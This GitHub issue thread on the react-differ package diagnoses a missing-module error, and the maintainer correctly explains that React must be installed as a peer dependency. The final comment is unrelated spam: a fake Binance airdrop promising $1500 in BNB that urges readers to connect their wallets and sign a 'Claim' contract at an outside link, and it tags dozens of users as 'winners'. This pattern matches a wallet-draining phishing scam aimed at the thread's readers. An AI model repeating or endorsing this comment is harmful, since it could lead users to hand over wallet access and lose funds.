### ISSUE TITLE
Cannot find module 'react' from '/Users/me/Projects/blocks/node_modules/react-differ/dist'

### ISSUE THREAD

**Issue by OKNoah** [nighca/differ#4]
This comes up when trying to use.

**Comment by nighca** [comment]
@OKNoah Have you add `react` as dependencies in your project? `react-differ` requires `react` as peer dependencies

**Comment by OKNoah** [comment]
Yes, I have React, and I think peer dependencies should install automatically? Will try re-install React. But I can only do React 15.

**Comment by nighca** [comment]
@OKNoah PeerDependencies [will not be installed automatically](https://docs.npmjs.com/files/package.json#peerdependencies) unless you add them as dependencies of your project.

React 15.x is fine.

Have you tried "re-install React"? Does that solve your problem?

**Comment by Azerxim** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @sk-ip, @xiaobaiwenlian, @mustang2247, @christiankiller, @z0rats, @dokugo, @hoangtrung99, @algovenus, @Franck-Fernandez-pro, @sowrovsarkar63, @dharmar, @odanado, @mckaywrigley, @vahidzafari, @giviz, @slaypni, @LetmeBX, @fedot, @loiclaudet, @ashtron, @toppyc4, @jiguangsdf, @jamesblackwell, @kautukkundan, @thrilok209, @itofarina, @eng-cc, @wuzhuzhu, @taisukemino, @ttytm, @dimorphic, @0xdwong, @Ruslan0111, @Meemaw, @hammer, @Seek4samurai, @reaperes, @eddort, @nicobailon, @adith-p, @IOsonoTAN, @KaptinLin, @ramozdev, @alfaindia, @danielNg25, @0xhanh, @Matzoh, @untungso, @Ifechukwudaniel, @facelessfool
